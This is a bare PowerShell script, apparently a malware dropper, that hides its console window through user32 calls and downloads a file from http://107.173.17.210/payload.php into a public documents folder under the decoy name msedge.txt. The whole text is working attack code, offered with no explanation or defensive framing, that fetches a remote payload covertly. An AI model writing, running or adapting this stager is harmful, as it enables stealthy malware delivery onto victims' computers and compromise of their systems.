Add-Type -Name W -Namespace H -MemberDefinition '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr h,int c);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();' -EA 0 [H.W]::ShowWindow([H.W]::GetConsoleWindow(),0) $f='C:\Users\Public\Documents\msedge.txt' $d=Split-Path $f if(!(Test-Path $d)){md $d -Force|Out-Null} (New-Object Net.WebClient).DownloadFile('http://107.173.17.210/payload.php',$f)